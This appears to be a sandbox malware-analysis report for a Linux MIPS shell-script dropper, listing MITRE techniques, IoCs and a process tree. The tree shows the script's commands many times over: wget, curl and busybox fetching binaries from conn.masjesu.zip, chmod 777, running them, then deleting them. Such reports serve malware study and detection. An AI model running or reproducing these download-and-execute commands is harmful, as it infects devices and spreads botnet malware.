f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846

Analysis

max time kernel
85s
max time network
87s
platform
debian-9_mips
resource
debian9-mipsbe-20240611-en
resource tags

arch:mipsimage:debian9-mipsbe-20240611-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipssystem
submitted
21-11-2024 08:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh
Size

10KB
MD5

870412aa111e349e42e1f548ec8a403b
SHA1

153e8fcedb429489b3693cc5cedeea4941f50863
SHA256

f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846
SHA512

80c0d64609a745be89da8498981397db3523be1ecd3ec0a572884e7c6f78b3daddf65d840bf0330d1de60961c4cf648168ff448090fc66701736735404041ef0
SSDEEP

192:7c8YN2uxllcj/ZuuUrdzr8YN2uZllcj/l0VW:7c8YN2u2uuUrtr8YN2ug0k

Score

7^/10

defense_evasion discovery

Malware Config

Signatures

File and Directory Permissions Modification 1 TTPs 28 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1007	chmod
895	chmod
930	chmod
944	chmod
867	chmod
888	chmod
972	chmod
764	chmod
796	chmod
835	chmod
881	chmod
902	chmod
951	chmod
923	chmod
958	chmod
986	chmod
993	chmod
747	chmod
965	chmod
1000	chmod
740	chmod
909	chmod
916	chmod
937	chmod
979	chmod
874	chmod
813	chmod
860	chmod

Executes dropped EXE 28 IoCs

Reads runtime system information 28 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl

System Network Configuration Discovery 1 TTPs 64 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
962	curl
971	busybox
788	busybox
812	busybox
887	busybox
894	busybox
933	wget
941	curl
810	curl
873	busybox
936	busybox
940	wget
982	wget
871	curl
990	curl
842	wget
884	wget
975	wget
996	wget
780	curl
906	curl
919	wget
985	busybox
743	wget
863	wget
885	curl
969	curl
983	curl
997	curl
817	curl
866	busybox
878	curl
1003	wget
1006	busybox
730	curl
738	busybox
870	wget
954	wget
964	busybox
989	wget
892	curl
912	wget
915	busybox
926	wget
950	busybox
978	busybox
744	curl
771	wget
905	wget
999	busybox
828	busybox
891	wget
901	busybox
908	busybox
934	curl
955	curl
750	wget
864	curl
899	curl
922	busybox
947	wget
968	wget
992	busybox
853	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY	curl
File opened for modification	/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD	curl
File opened for modification	/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR	curl
File opened for modification	/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p	curl
File opened for modification	/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA	curl
File opened for modification	/tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY	curl
File opened for modification	/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo	curl
File opened for modification	/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY	curl
File opened for modification	/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa	curl
File opened for modification	/tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa	curl
File opened for modification	/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx	curl
File opened for modification	/tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY	curl
File opened for modification	/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp	curl
File opened for modification	/tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA	curl
File opened for modification	/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL	curl
File opened for modification	/tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp	curl
File opened for modification	/tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p	curl
File opened for modification	/tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo	curl
File opened for modification	/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a	curl
File opened for modification	/tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a	curl
File opened for modification	/tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD	curl
File opened for modification	/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I	curl
File opened for modification	/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa	curl
File opened for modification	/tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx	curl
File opened for modification	/tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL	curl
File opened for modification	/tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I	curl
File opened for modification	/tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa	curl
File opened for modification	/tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR	curl

/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh
/tmp/f4753da29d120400a103b808d14bde88c9003a6e4d3f52ddf9de2d5b96b77846.sh
1⤵
PID:708
- /bin/rm
  /bin/rm bins.sh
  2⤵
  PID:711
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  PID:714
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:730
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - System Network Configuration Discovery
  PID:738
- /bin/chmod
  chmod 777 jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - File and Directory Permissions Modification
  PID:740
- /tmp/jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  ./jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  - Executes dropped EXE
  PID:741
- /bin/rm
  rm jCKUuK261HO2qfyeQcMJ2Rh0MLxXHXUaMY
  2⤵
  PID:742
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - System Network Configuration Discovery
  PID:743
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:744
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  PID:746
- /bin/chmod
  chmod 777 vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - File and Directory Permissions Modification
  PID:747
- /tmp/vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  ./vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  - Executes dropped EXE
  PID:748
- /bin/rm
  rm vThMU60BatKKz7M4SJA19yfrcnnk7GUcFD
  2⤵
  PID:749
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - System Network Configuration Discovery
  PID:750
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:751
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  PID:759
- /bin/chmod
  chmod 777 vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - File and Directory Permissions Modification
  PID:764
- /tmp/vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  ./vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  - Executes dropped EXE
  PID:765
- /bin/rm
  rm vq7fuTr6poCBbuYKu55715YQxZHTQx8uIa
  2⤵
  PID:769
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - System Network Configuration Discovery
  PID:771
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:780
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - System Network Configuration Discovery
  PID:788
- /bin/chmod
  chmod 777 I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - File and Directory Permissions Modification
  PID:796
- /tmp/I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  ./I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  - Executes dropped EXE
  PID:798
- /bin/rm
  rm I0A06e0QfY7lQp4jDsbzPNWuMsQ3HkPmDx
  2⤵
  PID:802
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  PID:803
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:810
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - System Network Configuration Discovery
  PID:812
- /bin/chmod
  chmod 777 MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - File and Directory Permissions Modification
  PID:813
- /tmp/MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  ./MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  - Executes dropped EXE
  PID:814
- /bin/rm
  rm MU5WMh88osvawZ8bUJUKA6f10hZSVV85vL
  2⤵
  PID:815
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  PID:816
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:817
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - System Network Configuration Discovery
  PID:828
- /bin/chmod
  chmod 777 zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - File and Directory Permissions Modification
  PID:835
- /tmp/zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  ./zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  - Executes dropped EXE
  PID:837
- /bin/rm
  rm zzPkxlzbd3hgUCGde6u2c8FdlchamQ3g6I
  2⤵
  PID:840
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - System Network Configuration Discovery
  PID:842
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:853
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  PID:859
- /bin/chmod
  chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - File and Directory Permissions Modification
  PID:860
- /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  ./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - Executes dropped EXE
  PID:861
- /bin/rm
  rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  PID:862
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - System Network Configuration Discovery
  PID:863
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:864
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - System Network Configuration Discovery
  PID:866
- /bin/chmod
  chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - File and Directory Permissions Modification
  PID:867
- /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  ./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - Executes dropped EXE
  PID:868
- /bin/rm
  rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  PID:869
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - System Network Configuration Discovery
  PID:870
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:871
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - System Network Configuration Discovery
  PID:873
- /bin/chmod
  chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - File and Directory Permissions Modification
  PID:874
- /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  ./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - Executes dropped EXE
  PID:875
- /bin/rm
  rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  PID:876
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  PID:877
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:878
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  PID:880
- /bin/chmod
  chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  ./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - Executes dropped EXE
  PID:882
- /bin/rm
  rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  PID:883
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - System Network Configuration Discovery
  PID:884
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:885
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - System Network Configuration Discovery
  PID:887
- /bin/chmod
  chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - File and Directory Permissions Modification
  PID:888
- /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  ./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - Executes dropped EXE
  PID:889
- /bin/rm
  rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  PID:890
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - System Network Configuration Discovery
  PID:891
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:892
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - System Network Configuration Discovery
  PID:894
- /bin/chmod
  chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - File and Directory Permissions Modification
  PID:895
- /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  ./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - Executes dropped EXE
  PID:896
- /bin/rm
  rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  PID:897
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  PID:898
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:899
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - System Network Configuration Discovery
  PID:901
- /bin/chmod
  chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - File and Directory Permissions Modification
  PID:902
- /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  ./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - Executes dropped EXE
  PID:903
- /bin/rm
  rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  PID:904
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - System Network Configuration Discovery
  PID:905
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:906
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - System Network Configuration Discovery
  PID:908
- /bin/chmod
  chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - File and Directory Permissions Modification
  PID:909
- /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  ./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - Executes dropped EXE
  PID:910
- /bin/rm
  rm RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  PID:911
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - System Network Configuration Discovery
  PID:912
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:913
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - System Network Configuration Discovery
  PID:915
- /bin/chmod
  chmod 777 ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - File and Directory Permissions Modification
  PID:916
- /tmp/ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  ./ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  - Executes dropped EXE
  PID:917
- /bin/rm
  rm ljHp8J1aTAXwkieEcb2bSqvnlGCVoSEPbo
  2⤵
  PID:918
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - System Network Configuration Discovery
  PID:919
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:920
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - System Network Configuration Discovery
  PID:922
- /bin/chmod
  chmod 777 YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - File and Directory Permissions Modification
  PID:923
- /tmp/YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  ./YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  - Executes dropped EXE
  PID:924
- /bin/rm
  rm YBI65ytUjOLI7cUUlzB8WTFhx9MrFwGhGa
  2⤵
  PID:925
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - System Network Configuration Discovery
  PID:926
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:927
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  PID:929
- /bin/chmod
  chmod 777 Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - File and Directory Permissions Modification
  PID:930
- /tmp/Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  ./Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  - Executes dropped EXE
  PID:931
- /bin/rm
  rm Ncfmi5B6nlel4yzUgdeSZqYwNXacYBPr5a
  2⤵
  PID:932
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - System Network Configuration Discovery
  PID:933
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:934
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - System Network Configuration Discovery
  PID:936
- /bin/chmod
  chmod 777 MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - File and Directory Permissions Modification
  PID:937
- /tmp/MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  ./MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  - Executes dropped EXE
  PID:938
- /bin/rm
  rm MbUk259n3rlKatHzOpVuhN4x1GYUt9nJTp
  2⤵
  PID:939
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - System Network Configuration Discovery
  PID:940
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:941
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  PID:943
- /bin/chmod
  chmod 777 Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - File and Directory Permissions Modification
  PID:944
- /tmp/Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  ./Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  - Executes dropped EXE
  PID:945
- /bin/rm
  rm Iti90bZ2C3vS9mDKFMVpLdoPpZLd6uKthR
  2⤵
  PID:946
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - System Network Configuration Discovery
  PID:947
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:948
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - System Network Configuration Discovery
  PID:950
- /bin/chmod
  chmod 777 hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - File and Directory Permissions Modification
  PID:951
- /tmp/hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  ./hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  - Executes dropped EXE
  PID:952
- /bin/rm
  rm hOdPfgDXRVnwuiXRg1cP0qxORyIIXRnw7p
  2⤵
  PID:953
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - System Network Configuration Discovery
  PID:954
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:955
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  PID:957
- /bin/chmod
  chmod 777 W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - File and Directory Permissions Modification
  PID:958
- /tmp/W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  ./W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  - Executes dropped EXE
  PID:959
- /bin/rm
  rm W7Zqj1wikmu2W3o0k92WzOVekSS2Ixy9AA
  2⤵
  PID:960
- /usr/bin/wget
  wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  PID:961
- /usr/bin/curl
  curl -O http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - Reads runtime system information
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:962
- /bin/busybox
  /bin/busybox wget http://conn.masjesu.zip/bins/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - System Network Configuration Discovery
  PID:964
- /bin/chmod
  chmod 777 RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - File and Directory Permissions Modification
  PID:965
- /tmp/RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  ./RtSV7IX7H94UN8QcNHsBceUjxHzIyCYymY
  2⤵
  - Executes dropped EXE
  PID:966
- /bin/rm
